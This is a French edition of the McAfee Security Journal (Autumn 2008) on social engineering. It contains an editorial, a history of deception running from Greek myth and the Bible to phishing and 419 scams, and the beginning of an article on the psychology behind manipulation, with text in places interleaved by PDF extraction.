Point de vue sur la sécurité — par McAfee® Avert® Labs Automne 2008

INGÉNIERIE SOCIALE
La principale menace de
sécurité au monde

CHEVAUX DE TROIE, fraude aux

clics et promesses d'argent facile
ne sont que quelques-unes des
tactiques exploitées par les auteurs
de logiciels malveillants pour piéger
les internautes
 McAfee Security Journal
Automne 2008

Sommaire Rédacteur en chef

Dan Sommer

Rédaction
Anthony Bettini
Hiep Dang
Benjamin Edelman
Elodie Grandjean
4 Les origines de l'ingénierie sociale Du cheval de Troie de l'Odyssée au Jeff Green
phishing sur Internet : la tromperie à l'épreuve du temps Hiep Dang Aditya Kapoor
Rahul Kashyap
Markus Jacobsson
9 Demandez et vous recevrez Les raisons psychologiques du succès de
Karthik Raman
l'ingénierie sociale Karthik Raman
Craig Schmugar
13 L'ingénierie sociale sur le Web : que nous réserve l’avenir ? Statistiques
La fraude aux clics compte sans doute parmi les menaces auxquelles nous Toralv Dirro
devrons faire face à l'avenir. Markus Jakobsson Shane Keats
David Marcus
16 Les Jeux Olympiques de Pékin : une cible de choix pour les logiciels François Paget
d'ingénierie sociale A l'instar d'autres événements marquants, les JO sont un Craig Schmugar
terrain de jeu irrésistible pour les auteurs de malwares. Elodie Grandjean
Illustrateur
22 Les vulnérabilités des marchés boursiers Les pirates peuvent-ils s'enrichir Doug Ross
grâce aux correctifs de Microsoft et à la falsification de l'actualité de sociétés ?
Anthony Bettini Graphisme
PAIR Design, LLC
28 L'avenir des sites de réseau social Les sommes d'argent colossales en jeu et
Remerciements
le nombre croissant d'inscrits font des sites de réseau social une cible alléchante
De nombreuses personnes ont contribué à
pour les auteurs de logiciels malveillants. Craig Schmugar la création de ce numéro de McAfee
Security Journal. Nous tenons à tous les
31 Le nouveau souffle des vulnérabilités Les techniques d'ingénierie sociale remercier et profitons de l'occasion pour
exposent les utilisateurs aux failles béantes des logiciels. Rahul Kashyap saluer nommément nos principaux
contributeurs : les cadres dirigeants de
34 Typosquatting: les itinéraires inattendus de la navigation sur Internet McAfee, Inc. et McAfee Avert Labs qui ont
L'internaute peu attentif doit s'attendre à l'inattendu. Benjamin Edelman encouragé et soutenu la création de ce
journal ; nos réviseurs Carl Banzhof, Hiep
38 Qu'est-il donc arrivé aux logiciels espions et aux logiciels publicitaires ? Dang, David Marcus, Craig Schmugar,
Un renforcement de la législation a peut-être permis de dompter les logiciels Anna Stepanov et Joe Telafici ; nos
espions, mais les programmes potentiellement indésirables et les chevaux de auteurs, leurs supérieurs et collègues qui
Troie n'ont pas dit leur dernier mot. Aditya Kapoor les ont assistés par leurs idées et
commentaires ; les experts en marketing
44 Statistiques Quel niveau de risque pour les domaines de premier niveau ? Cari Jaquet, Mary Karlton, Beth Martinez
et Jennifer Natwick ; notre chargé de
David Marcus
relations publiques Joris Evers et son
équipe internationale, ainsi que Red
Consultancy Ltd. ; notre agence de
graphisme Pair Design ; notre imprimeur
RR Donnelley ; Derrick Healy et ses
collègues du bureau de localisation de
Cork en Irlande, qui ont traduit cette
publication dans de nombreuses langues.
Cette publication n'aurait pas été possible
sans leur inestimable contribution.

Dan Sommer
Rédacteur en chef

Vous avez apprécié ce numéro ? Certaines

choses vous ont déplu ? Envoyez-nous
vos commentaires par e-mail à l'adresse
Security_Journal@mcafee.com.
Les débuts du journal
de la sécurité McAfee
Jeff Green
Nous sommes heureux de vous présenter le premier
numéro de McAfee Security Journal. En réalité, il ne s'agit pas
à strictement parler d'un premier numéro, puisque nous avons
rebaptisé la publication intitulée, suivant les pays, McAfee Sage/
Global Threat Report — en français, Point global sur les menaces.
Notre McAfee Security Journal présente le même point de vue
sans détour et le même contenu dynamique que vous attendez
désormais des meilleurs chercheurs et auteurs dans le domaine
de la sécurité informatique : les experts de McAfee® Avert®
Labs. Dans ce numéro, nous nous pencherons sur le vecteur de
menaces le plus insidieux et répandu : l'ingénierie sociale.
Pour un Tibet libre ! Nouvelles images de la 3e guerre
mondiale ! Les meilleures astuces pour évader le fisc !
Nouvelles technologies pour économiser l'énergie ! Achetez
des médicaments bon marché en ligne !
La liste est loin d'être exhaustive, mais les exemples illustrent
bien notre propos. Pour parvenir à leurs fins, les auteurs de
logiciels malveillants (malwares) et les spécialistes de l'usurpation
d'identité doivent créer des messages attirants et efficaces,
bien plus que par le passé. Les arnaques par ingénierie sociale,
toutefois, sont loin de constituer une nouveauté. Elles sont aussi
vieilles que la communication humaine elle-même. « Tu possèdes
une chose que je convoite. Je vais essayer de te convaincre de
me la donner ou d'agir comme je le souhaite. » L'ingénierie
sociale est probablement la menace la plus difficile à contrer en
raison du facteur humain. La façon la plus facile de dérober les
informations d'identité d'une personne est sans doute de lui
demander tout simplement de vous les fournir.
Les techniques d'ingénierie sociale (qu'il s'agisse de chaînes de
Ponzi, de systèmes de pyramides, d'impostures, d'escroqueries, de
phishing ou de spam) se conforment toutes à un même modèle.
Certaines de ces attaques sont physiques, d'autres numériques,
mais elles ont toutes des éléments en commun. Elles poursuivent le
même objectif et utilisent souvent les mêmes techniques. Elles visent
toutes à manipuler leurs victimes en exploitant une faiblesse de la
nature humaine, Elles créent des scénarios conçus pour persuader la
victime de dévoiler des informations ou d'accomplir une action.
Pour la rédaction de ce numéro, nous avons fait appel à
d'éminents chercheurs et auteurs afin qu'ils analysent et illustrent
ce thème à votre intention. Ce numéro constitue en outre une
véritable première puisque des contributeurs invités ont également
participé à sa création. Remercions donc à cet égard deux noms
prestigieux : Markus Jacobsson du Palo Alto Research Center et
Benjamin Edelman, professeur à la Harvard Business School.
Nous commencerons par nous pencher sur le passé, avec
un bref exposé sur la tromperie à travers les âges. Ensuite,
nous examinerons les éléments de psychologie qui expliquent
la réussite de l'ingénierie sociale. Notre troisième article se
projettera dans l'avenir et envisagera l'évolution probable de
l'ingénierie sociale au cours des prochaines années. Au lendemain
des Jeux Olympiques 2008 de Pékin, nous analyserons les
stratagèmes encore une fois imaginés par les auteurs de logiciels
malveillants pour amener les amateurs de sport à visiter des
sites web factices. Est-il possible de gagner en bourse en tablant
sur des événements tels que le jour de diffusion des correctifs
mensuels Microsoft ou en créant de faux articles d'actualité
d'entreprises ? Nos recherches de pointe ont permis de répondre
à ces questions. Quel est l'avenir des sites de réseau social ? Leur
sécurité sera-t-elle renforcée, ou sont-ils voués à rester des proies
faciles à cause de la trop grande crédulité de leurs utilisateurs ?
Nous nous pencherons aussi sur la façon dont les auteurs de
logiciels malveillants tirent parti des vulnérabilités des logiciels et
du typosquatting, qui consiste à exploiter les fautes de frappe
dans les requêtes de page web. Notre dernier article fournit
un aperçu historique des logiciels publicitaires (adwares) et des
logiciels espions (spywares). Enfin, diverses statistiques vous
permettront d'apprécier les différents degrés de risque auxquels
sont exposés les domaines de premier niveau de par le monde.
Nous espérons que vous trouverez ce numéro aussi captivant et
propice à la réflexion qu'il l'a été pour nous. Merci de vous joindre
à nous pour explorer les arcanes de la sécurité informatique.
Jeff Green est Vice-Président directeur de McAfee
Avert Labs et du département Développement de
produits. Il est responsable à l'échelle mondiale de
tous les centres de recherche de McAfee, établis sur
les continents américain, européen et asiatique. Jeff
Green est à la tête des équipes de recherche sur les
différents types de menaces (virus, attaques ciblées
et par piratage, logiciels espions, spam et attaques
par phishing), sur les vulnérabilités et les patches,
ainsi que sur les technologies de détection et de
prévention des intrusions sur l'hôte et sur le réseau.
Il dirige également la recherche à long terme, qui
permet à McAfee de conserver une longueur
d'avance sur les menaces émergentes.
AUTOMNE 2008 3
Les origines de
l'ingénierie sociale
Hiep Dang
A l'heure actuelle, il est rare de lire un article d'actualité ou un
ouvrage consacré à la sécurité informatique sans tomber plusieurs
fois sur l'expression ingénierie sociale.
Rendue populaire par Kevin Mitnick (sans doute le plus tristement
célèbre représentant de l'ingénierie sociale de l'ère informatique
moderne), l'ingénierie sociale est l'art de persuasion ultime : elle
tente de convaincre les individus de dévoiler des informations
confidentielles et d'agir d'une certaine manière. Bien que
cette expression « ingénierie sociale » soit contemporaine, ses
techniques et philosophies sous-jacentes existent depuis l'aube
de l'humanité. Des récits de tromperie et de manipulation se
retrouvent dans l'histoire, le folklore, la mythologie, la religion
et la littérature.
Prométhée : dieu de l'ingénierie sociale ?
D'après la mythologie grecque, le talent des hommes pour
l'ingénierie sociale leur vient probablement de Prométhée, qui
était tellement versé dans cet art qu'il parvint à tromper Zeus
lui-même. Dans la Théogonie et Les travaux et les jours, le poète
épique Hésiode raconte l'histoire de Prométhée, un Titan connu
pour sa ruse et ses fourberies. Selon la légende, il aurait par
ailleurs créé l'Homme à partir d'une motte d'argile. Prométhée
fit une démonstration célèbre de sa ruse à Mécone, en offrant
à Zeus un choix pour régler un différend opposant les dieux et
les mortels. L'une des offrandes proposées était un estomac
de bœuf rempli de viande ; l'autre était constituée des os de
l'animal recouverts d'une graisse épaisse. La première était donc
de la nourriture sous le couvert d'une enveloppe répugnante,
tandis que l'autre était immangeable mais rendue attirante par
une apparence alléchante. Zeus choisit la seconde offrande :
les hommes purent ainsi se contenter d'offrir aux dieux des
sacrifices faits d'os et de graisse, et garder la viande pour eux.
Zeus, furieux d'avoir été trompé par Prométhée, punit les mortels
en leur refusant le feu. Mais, au cours d'un autre épisode
4 McAFEE SECURITY JOURNAL
d'ingénierie sociale, Prométhée se joua à nouveau de Zeus et
lui « ayant dérobé une portion splendide du feu inextinguible,
qu'il cacha dans une férule creuse » à partir du Mont Olympe,
il le remit aux mortels. En guise de punition, Prométhée fut
enchaîné à un rocher et condamné à voir chaque jour un aigle se
repaître de son foie, lequel renaissait nuit après nuit. Zeus infligea
également un châtiment aux hommes : il créa la première femme,
Pandore, et avec elle, une jarre. Piquée par la curiosité, elle ouvrit
cette dernière, qui libéra sur-le-champ d'innombrables maux.
L'attaque par phishing, selon Jacob et Rebecca
L'Ancien Testament nous conte l'histoire de Jacob et de sa mère,
Rebecca. Ceux-ci eurent recours à une technique d'ingénierie
sociale qui a jeté les bases des attaques par phishing modernes,
où la victime pense être abordée par quelqu'un d'autre que
l'auteur de l'attaque. Isaac, père de Jacob et époux de Rebecca,
devint aveugle à la fin de sa vie. Alors qu'il se préparait à la mort,
il demanda à son aîné, Esaü : « chasse-moi du gibier, fais-moi
un mets comme j'aime, et apporte-le-moi à manger, afin que
mon âme te bénisse avant que je meure ». (Genèse 27:2–4)
Souhaitant que Jacob reçoive la bénédiction d'Isaac à la place
d'Esaü, Rebecca mit au point un plan. Jacob fut d'abord
hésitant : « Esaü, mon frère, est velu, et je n'ai point de poil.
Peut-être mon père me touchera-t-il, et je passerai à ses yeux
pour un menteur, et je ferai venir sur moi la malédiction, et non
la bénédiction. » (Genèse 27:11–12) Pour tromper Isaac en lui
faisant croire qu'il était aux côtés d'Esaü, Rebecca prépara le
repas d'Isaac, para Jacob des plus beaux atours d'Esaü et attacha
une peau de chèvre aux mains et au cou glabres de Jacob. Ce
dernier apporta le mets à Isaac, passa le test d'authentification et
reçu la bénédiction qui revenait à Esaü.
Samson et Dalila : espionnage sous contrat
Samson était un personnage biblique d'une force extraordinaire
qui combattit les Philistins. Le secret de sa puissance résidait dans
sa longue chevelure. Alors qu'il était à Gaza, Samson tomba
amoureux de Dalila. Mais les Philistins parvinrent à convaincre la
belle de leur dévoiler le secret de la force de Samson en lui offrant
1 100 pièces d'argent. « Flatte-le, pour savoir d'où lui vient sa
grande force et comment nous pourrions nous rendre maîtres de
lui ; nous le lierons pour le dompter, et nous te donnerons chacun
mille et cent sicles d'argent. » (Juges 16:5) Samson résista avant
de succomber à la force persuasive de Dalila et finit par lui révéler
son secret. Elle lui dit : « Comment peux-tu dire : Je t'aime !
puisque ton cœur n'est pas avec moi ? Voilà trois fois que tu
t'es joué de moi, et tu ne m'as pas déclaré d'où vient ta grande
force. » Comme chaque jour, elle tourmentait et l'importunait
par ses questions, il finit par abandonner toute résistance, et lui
dit : « Le rasoir n'a point passé sur ma tête ; parce que je suis
consacré à Dieu dès le ventre de ma mère. Si j'étais rasé, ma force
m'abandonnerait ; je deviendrais faible, et je serais comme tout
autre homme. » (Juges 16:15-17) Peu après qu'il tomba endormi,
Dalila exploita sa vulnérabilité en lui rasant les cheveux. Les
Philistins profitèrent de la faiblesse de Samson pour lui crever les
yeux et l'enchaîner, puis le condamnèrent à la prison à vie.
Le premier cheval de Troie
Rendu célèbre par deux poètes épiques, le Grec Homère dans son
Odyssée et le Romain Virgile dans son Enéide, l'épisode du cheval
de Troie fut l'une des ruses d'ingénierie sociale les plus habiles de
l'histoire de l'humanité. Au cours de la Guerre de Troie, les Grecs
ne parvenaient pas à renverser les murailles qui entouraient la
cité troyenne. Astucieux, le guerrier grec Ulysse mit au point une
ruse pour leurrer les Troyens en leur faisant croire que les Grecs
avaient cessé leur assaut de la ville. Les bateaux de la flotte hellène
quittèrent les côtes, et seuls un grand cheval de bois et un soldat
grec nommé Sinon restèrent sur la plage. Après avoir été capturé
par les Troyens, Sinon leur raconta que les Grecs avaient laissé un
immense cheval de bois en guise d'offrande aux dieux, afin que
ces derniers les protègent lors de leur voyage de retour, et qu'ils
l'avaient fait gigantesque pour qu'il ne puisse pas être emmené à
Troie, sans quoi ils risquaient de s'attirer le mauvais sort. La tentation
était trop grande pour les Troyens, qui trainèrent le majestueux
animal à l'intérieur de leurs murs et ce, malgré les avertissements de
Cassandre, condamnée à prononcer des prophéties toujours vraies
mais auxquelles personne ne croirait jamais, et ceux de Laocoön,
prêtre troyen, qui s'exclamait dans l'Enéide :
« 0 Troie ! ô ville malheureuse ! Citoyens insensés, que faites-vous ?
Croyez-vous qu'en effet les Grecs soient loin de nous,
Que même leurs présents soient exempts d'artifice ?
Ignorez-vous leur fourbe, ignorez-vous Ulysse ?
Ou les Grecs sont cachés dans ces vastes contours ?
Ou ce colosse altier, qui domine nos tours,
vient observer Pergame ; ou l'affreuse machine,
De nos murs imprudents médite la ruine.
Craignez les Grecs, craignez leurs présents désastreux :
Les dons d'un ennemi sont toujours dangereux. »
Le manque de discernement des Troyens précipita leur chute.
Cette nuit-là, sous le commandement d'Ulysse, les soldats grecs
dissimulés dans le cheval tuèrent les gardes et ouvrirent les
portes de la ville au reste de leur armée. Grâce à l'habile tactique
d'ingénierie sociale mise au point par Ulysse, les Grecs eurent
raison des Troyens et gagnèrent la guerre.
Le cheval de Troie d'aujourd'hui
Lorsqu'Ulysse ourdit son plan d'infiltration de Troie, il ne
s'attendait pas à créer un précédent pour les millénaires à venir.
De nos jours, le type de logiciel malveillant (malware) le plus
répandu dans le monde, le « cheval de Troie » électronique, a été
baptisé ainsi par Daniel Edwards de la National Security Agency
(NSA) durant les années 1970, en référence à la technique
d'ingénierie sociale utilisée par les Grecs. Avant l'ère d'Internet,
les utilisateurs qui souhaitaient partager des fichiers recouraient
pour cela à des supports physiques (tels que disquettes
ou lecteurs de bande) ou se connectaient à des systèmes
d'information télématiques (BBS). Les pirates informatiques
ont vite réalisé qu'ils pouvaient les inciter à exécuter du code
malveillant en donnant à ce dernier l'apparence d'un jeu ou
d'un utilitaire. La simplicité et l'efficacité incroyable des chevaux
de Troie font que les auteurs de logiciels malveillants ont encore
recours à cette technique d'ingénierie sociale plusieurs décennies
plus tard. Aujourd'hui, le nombre d'utilisateurs de PC qui,
tombant dans les multiples pièges tendus, se laissent infecter par
des chevaux de Troie croît de façon alarmante : ils ne peuvent
résister à de la musique, des vidéos et des logiciels gratuits, ou
encore aux cartes de vœux électroniques de personnes qu'ils ne
connaissent pourtant ni d'Eve ni d'Adam.
AUTOMNE 2008 5
Croissance des logiciels malveillants et des programmes potentiellement indésirables (PUP)
Familles, de 1997 à 2007 en milliers

140
130 Virus et robots
120 Chevaux de Troie
Programmes
110 potentiellement
indésirables
100
90
80 Figure 1 : La fréquence de
publication de fichiers de
70 signatures de McAfee destinés
spécifiquement aux logiciels
60 malveillants et aux programmes
potentiellement indésirables
50 a connu plusieurs pics cette
dernière décennie. En 1998, les
40
générateurs de virus ont fait
leur apparition. Entre 2003 et
30
2004, les mass-mailers se sont
20 répandus. Entre 2004 et 2005,
les réseaux de robots (botnets)
10 étaient en hausse. Et entre 2006
et 2007, les chevaux de Troie ont
0 connu une croissance fulgurante.
1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007

Une escroquerie remise au goût du jour

La fraude nigériane, également appelée fraude 419, existe
depuis plusieurs décennies et demeure l'un des types de spam
les plus prolifiques. Le nombre « 419 » fait référence à la section
du code pénal nigérian qui condamne cette arnaque. Cette
tactique d'ingénierie sociale qui mise sur la promesse d'argent
facile se présente sous la forme de lettres, dont les premières
ont été remises dans des boîtes aux lettres postales au cours des
années 1970. L'escroquerie a ensuite évolué : les télécopies non
sollicitées envoyées durant les années 1980 ont cédé la place
aux e-mails, qui constituent la méthode de propagation presque
exclusivement utilisée de nos jours. L'origine de cette tromperie
remonte au 16e siècle ; elle était alors nommée « arnaque du
prisonnier espagnol ». Le procédé est simple : on jouait sur la
naïveté de la victime en prétendant qu'un prisonnier espagnol
extrêmement fortuné avait besoin d'aide pour être libéré. Le
soi-disant détenu comptait sur l'auteur de la supercherie afin
de récolter suffisamment d'argent pour être relaxé. L'arnaqueur
abordait la victime et lui « offrait la possibilité » de participer à la
collecte de fonds, avec la promesse de réaliser d'importants gains
financiers. De nos jours, la lettre compte de nombreuses variantes
mais le concept demeure le même. La fraude nigériane vise à
faire miroiter des gains mirobolants pour un « investissement »
des plus modiques. Bien que la plupart des destinataires de la
lettre se rendent compte que l'offre est trop belle pour être vraie,
on estime que 1 % d'entre eux y répondent. D'après les services
secrets américains, les arnaqueurs parviennent ainsi à extorquer à
leurs victimes cent millions de dollars en moyenne par an.

6 McAFEE SECURITY JOURNAL

Tentatives de phishing signalées
En milliers

60

Tentatives de phishing
50
individuelles signalées

40 Nouveaux sites
de phishing

30

Figure 2 : Les tentatives de

20
phishing signalées augmentent de
façon constante, mais le nombre
10 de nouveaux sites de phishing
a littéralement explosé ces deux
dernières années. (Source : Anti-
0 Phishing Working Group)

Nov. Mai Nov. Mai Nov. Mai Nov. Mai Nov.

2003 2004 2004 2005 2005 2006 2006 2007 2007

Phishing
Le terme « phishing » (hameçonnage) est une invention
des pirates informatiques. Il a été forgé par analogie avec le
terme anglais « fishing » (qui signifie « pêche ») du fait que
la technique d'ingénierie sociale utilise un leurre pour amener
les victimes à dévoiler leurs noms d'utilisateur, mots de passe,
numéros de carte de crédit et autres informations personnelles.
Dans les années 1990, de nombreux pirates informatiques
ont exploité les offres d'essai gratuites de services Internet
d'AOL (America Online) en utilisant des numéros de carte de
crédit factices, générés automatiquement, qui en réalité ne
correspondaient pas aux comptes existants. Après qu'AOL a
renforcé ses mécanismes de sécurité et amélioré ses tests de
validation des cartes de crédit pour garantir la légitimité des
numéros, les escrocs ont commencé à rechercher des noms
d'utilisateur et mots de passe réels pour attaquer les réseaux du
fournisseur de services. Ils se sont mis à envoyer de faux e-mails
et messages instantanés semblant provenir du support technique
d'AOL. De nombreuses victimes peu méfiantes ont révélé leurs
informations de compte, et les activités et achats réalisés par
les pirates à l'aide de leurs comptes compromis leur ont été
facturés. Ces malfaiteurs n'ont pas mis longtemps à se rendre
compte des plantureux profits à la clé et du taux de réussite de
ce type d'attaque : ils se sont mis à cibler des sociétés (banques,
eBay, Amazon et d'autres) spécialisées dans les transactions et le
commerce en ligne.

AUTOMNE 2008 7
Sécurité informatique : petite perspective historique

Les chevaux de Troie McAfee Avert Labs devient la

font leur apparition sur première équipe d'intervention
les BBS. d'urgence contre les virus à
ARPANET (précurseur d'Internet) Internet est constitué à l'échelle mondiale.
est créé. partir d'ARPANET. La première attaque par phishing est
Le spam, ou courrier non sollicité, lancée pour dérober les mots de
Creeper (le premier virus apparaît peu après qu'Internet passe des utilisateurs AOL.
informatique) est déployé devient accessible au grand public. Aujourd'hui, McAfee Avert Labs garantit une
sur le réseau ARPANET. protection contre les virus, les vers, les
Frederick Cohen publie l'ouvrage
John von Neumann publie sa « Experiments with Computer chevaux de Troie, les logiciels espions, les
théorie des automates Viruses » (Expériences sur les virus programmes potentiellement indésirables,
autoréplicateurs. informatiques) et attribue à Leonard l'exploitation des vulnérabilités, le spam, le
Adleman l'invention du terme phishing, les domaines malveillants, ainsi que
« virus informatique ». les intrusions sur l'hôte et le réseau.

1948 1965 1969 1971 1978 1980 1982 1983 1984 1986 1988 1995 1996 2000 2002 2008

Le ver Morris (le premier

ver à se répliquer
Elk Cloner (le premier automatiquement) fait
virus sur Apple) est mis en son apparition.
circulation. Kevin Mitnick publie « The Art of
La messagerie Le premier système Brain (le premier virus Deception » (L'art de la
électronique est créée. d'information télématique sur PC) apparaît. tromperie), qui décrit ses talents
(BBS) est mis au point. en matière d'ingénierie sociale.

John Draper (surnommé Captain
Crunch) découvre qu'un sifflet
offert en cadeau dans une boîte de
céréales peut être utilisé pour
pirater des réseaux téléphoniques
(phreaking).
Le film « War Games » montre Les termes « spyware » (logiciel
à l'écran les conséquences du espion) et « adware » (logiciel
piratage informatique. publicitaire) commencent à
se répandre.

Figure 3 : Chronologie des événements marquants de l'ingénierie sociale

L'histoire se répète
Quel que soit le terme employé — ingénierie sociale, tromperie,
escroquerie, exploitation des biais cognitifs ou arnaque —, le
procédé qui vise à abuser de la naïveté et de la confiance d'un Hiep Dang est Directeur des recherches sur la lutte
contre les logiciels malveillants au sein de McAfee
individu est vieux comme le monde. Les experts en sécurité Avert Labs. Il est chargé de la coordination de
s'accordent à dire que l'homme est le maillon faible de la chaîne l'équipe mondiale des experts en logiciels malveillants
de la sécurité. Nous pouvons développer les logiciels les plus sûrs de McAfee, spécialisés dans la recherche sur les
pour protéger les ordinateurs, mettre en œuvre les stratégies de attaques de malwares (notamment les virus, les
sécurité les plus restrictives ou déployer tous les efforts possibles vers, les chevaux de Troie, les robots et les logiciels
espions), leur analyse et l'élaboration de réponses.
pour sensibiliser les utilisateurs : tant que nous agirons sous M. Dang contribue régulièrement à la rédaction des
le coup de la curiosité et de la cupidité, sans tenir compte des livres blancs et des articles de blog d'Avert Labs, et
conséquences éventuelles, nous risquons de revivre un nouveau il participe également à la rédaction de McAfee
cauchemar semblable à la tragédie du cheval de Troie. Security Journal. Il a été interviewé par le Wall Street
Journal, MSNBC, PC Magazine, et de nombreuses
Le progrès ne tient pas au changement : il dépend de la capacité autres publications et médias au sujet des tendances
à le rendre durable. Quand le changement est absolu, il ne reste des menaces et programmes malveillants. Hiep Dang
plus aucune possibilité d'amélioration et aucune orientation est également un fervent pratiquant du Tai Chi et du
d'amélioration n'est définie : et quand les leçons tirées de Kung Fu du style de la mante religieuse ou Tang Lang
Quan. Il a actuellement mis entre parenthèses ses
l'expérience ne sont pas retenues, comme parmi les sauvages, séances d'entraînement pour focaliser ses énergies sur
l'enfance perdure. Ceux qui ne peuvent pas se souvenir du la sécurité informatique.
passé sont condamnés à le répéter. — George Santayana,
volume « Reason in Common Sense » de « The Life of Reason »

OUVRAGES CITÉS
t Anderson J.P., Computer Security Technology Planning Study, vol. II (Etude sur la
planification des technologies de sécurité informatique), US Air Force, 1972
t Farquhar M., A Treasury of Deception (Histoire de la tromperie), New York,
The Penguin Group
t Hésiode, Théogonie (traduction de C. M. Leconte de Lisle, 1869)
t Hésiode, Les travaux et les jours (traduction de C. M. Leconte de Lisle, 1869)
t Homère, L'Odyssée, (traduction de C. M. Leconte de Lisle)
t Mitnick K., The Art of Deception (L'art de la supercherie), Indianapolis, Wiley Publishing
t Myers M. J., Phishing and Countermeasures (Phishing et contremesures), John
Wiley & Sons, Inc., 2007
t Santayana G., The Life of Reason (La vie de la raison), 1905
t Virgile, L'Enéide, 19 av. J.-C. (traduction de Jacques Delille)

8 McAFEE SECURITY JOURNAL

Demandez et
vous recevrez
Karthik Raman
En janvier 2007, des cybercriminels ont eu recours à des tactiques d'ingénierie
sociale pour réaliser la plus grosse arnaque en ligne de tous les temps, dérobant près
de 900 000 euros (1,1 million de dollars) aux clients de la banque suédoise Nordea.
Les clients de Nordea ont reçu un e-mail semblant provenir de la
banque, et 250 d'entre eux ont téléchargé puis installé le soi-disant
logiciel « antispam » préconisé par l'e-mail. En réalité, ce logiciel
n'était autre qu'un cheval de Troie qui collectait des informations
sur les clients, à l'aide desquelles les escrocs se connectaient au site
web de la banque pour ensuite vider les comptes bancaires1.
Selon un principe de sécurité bien connu, l'homme est le maillon
faible de tout système de sécurité. Bien que les attaques de
sécurité et les mécanismes de défense développés pour y faire face
ne cessent d'évoluer, la nature humaine quant à elle ne change
pas. Une attaque par ingénierie sociale est bien plus efficace et se
révèle lucrative plus rapidement pour son auteur qu'une attaque
en force, qui l'oblige à craquer des algorithmes de chiffrement, à
dénicher de nouvelles vulnérabilités logicielles ou à inventer des
logiciels malveillants toujours plus complexes. Lors de la fraude
perpétrée contre Nordea, il a été plus simple pour les malfaiteurs
d'inviter les clients de la banque à installer un cheval de Troie que
de forcer un coffre-fort pour y dérober de l'argent.
Notre crédulité, notre cupidité et notre curiosité nous rend
facilement manipulables, et l'ingénierie sociale exploite
précisément nos sentiments et notre manière de penser. Les
spécialistes en ingénierie sociale demandent des renseignements
ou invitent l'utilisateur à effectuer une action, et bien souvent,
ils font mouche. Mais pourquoi ?
Lors de ses travaux précurseurs sur la psychologie de la sécurité,
l'expert de renom Bruce Schneier a identifié quatre pôles de
recherche : l'économie comportementale, la psychologie de
la décision, la psychologie du risque et la neuroscience. Ceux-
ci permettent d'expliquer plus facilement les raisons pour
lesquelles notre perception de la sécurité diverge de la réalité2. Ce
numéro de McAfee Security Journal et cet article en particulier
se concentrent sur l'un des aspects de la sécurité : l'ingénierie
sociale. Notre analyse portera sur la neuroscience, la psychologie
de la décision et des notions élémentaires de psychologie sociale,
afin de déterminer comment les individus ne perçoivent pas la
manipulation et tombent dans les pièges de l'ingénierie sociale.
Deux cerveaux en un
Selon certains, le cerveau de l'Homme est le système le plus
complexe présent dans l'univers. Cela est dû en partie à la
complexité de sa structure et des interactions entre ses sous-
systèmes extrêmement intriqués.
Dans le cerveau, les émotions semblent émaner de zones internes
et anciennes, telles que l'amygdale, alors que le raisonnement
est contrôlé par des parties externes, plus récentes, telles que le
néocortex3. Toutefois, les sièges des émotions et de la raison ne
s'excluent pas mutuellement, comme Isaac Asimov le souligne
dans son livre The Human Brain4 :
Il semblerait que les émotions n'émanent pas d'une
quelconque partie minuscule du cerveau, mais bien de
plusieurs zones, notamment les lobes frontal et temporal du
cortex, par un mécanisme complexe d'actions réciproques.
Les parties du cerveau qui gèrent l'émotion et la raison peuvent
parfois collaborer ou être en conflit. C'est pourquoi nous
éprouvons des difficultés à dissocier l'émotion de la raison, et
pourquoi la première l'emporte facilement sur la seconde lorsque
les deux s'opposent.
Voyons à présent comment nous gérons la peur par exemple.
Lors de son analyse de nos réactions face à un danger imminent,
l'auteur scientifique Steven Johnson précise que la réponse
à la peur s'effectue selon « une combinaison harmonieuse
d'instruments physiologiques qui interviennent avec une précision
et une rapidité remarquables5 :
En langage courant, nous appelons cette réaction « le combat
ou la fuite ». La sensation de sa manifestation est l'une des
meilleures façons de prendre conscience que le cerveau et le
corps peuvent opérer comme un système autonome, en toute
indépendance de la volonté consciente.
AUTOMNE 2008 9
Lorsque nous revivons la situation ayant entraîné le combat
ou la fuite par le passé, nous laissons la réponse émotionnelle
reprendre le contrôle, bien que notre raison nous pousse
objectivement à rejeter son bien-fondé.
Les politiciens malhonnêtes, les espions et les escrocs savent que
jouer sur l'émotion — en particulier sur la peur — pour susciter
une réaction affective est un moyen très efficace de parvenir à
leurs fins. L'ingénierie sociale s'inscrit dans cette optique.
Théories au sujet de l'ingénierie sociale
Manipulation des émotions
De nombreux virtuoses de l'ingénierie sociale exercent une
manipulation mentale, en tirant parti de la peur, la curiosité, la
cupidité et l'empathie de leurs proies. Il est établi qu'il s'agit là de
sentiments universels : nous les éprouvons tous un jour ou l'autre.
La peur et la curiosité sont utiles dans de nombreuses situations.
Par exemple, la peur nous incite heureusement à nous échapper
d'un immeuble en feu. Quant à la curiosité, elle peut nous
pousser à nous lancer des défis et à chercher à en apprendre
toujours davantage. Cependant, lorsque nos actes sont dictés
par la peur ou la curiosité, leurs conséquences peuvent être
indésirables voire dangereuses6.
Certaines attaques exploitant l'ingénierie sociale peuvent être
lancées même sans que leur auteur ne soit présent sur les lieux
pour exploiter la curiosité des victimes potentielles. En avril 2007,
des clés USB infectées par un cheval de Troie ciblant les banques
avaient été déposées dans un parking londonien. Les curieux
désireux de connaître le contenu de ces clés — et probablement
ravis de prendre gratuitement possession d'un périphérique de
stockage — ont branché celles-ci à leurs ordinateurs, avec pour
seul résultat de voir ce dernier infecté par un logiciel malveillant7.
Les auteurs d'attaques qui menacent ou font chanter leurs
victimes exploitent leur peur. Le cheval de Troie GPCoder.i, qui
a fait son apparition en juin 2008, est un exemple de logiciel
malveillant qui instille la peur : après avoir chiffré des fichiers des
utilisateurs, il exige de ces derniers une rançon pour déchiffrer
leurs fichiers8. De même, les auteurs d'attaques qui soudoient
leurs victimes exploitent leur cupidité, et ceux qui prétendent
rechercher de l'aide, leur empathie.
Distorsions dans les raccourcis mentaux
Les experts en ingénierie sociale font parfois appel à des éléments
extérieurs au registre émotionnel. Ils s'efforcent de saboter
nos règles mentales de traitement de l'information, que nous
appelons heuristique, ou règles empiriques.
Il faut bien l'admettre : notre heuristique présente certaines
failles, certes, mais nous ne pouvons pas fonctionner sans elle.
Nos vies seraient trop compliquées si nous devions réfléchir
longuement à chaque perception, chaque propos, chaque action.
Nous avons désespérément besoin de nos raccourcis mentaux. Le
psychologue Robert Cialdini l'explique de la façon suivante9 :
10 McAFEE SECURITY JOURNAL
Les politiciens malhonnêtes, les espions et
les escrocs savent que jouer sur l'émotion
— en particulier sur la peur — pour susciter
une réaction affective est un moyen très
efficace de parvenir à leurs fins. L'ingénierie
sociale s'inscrit dans cette optique.
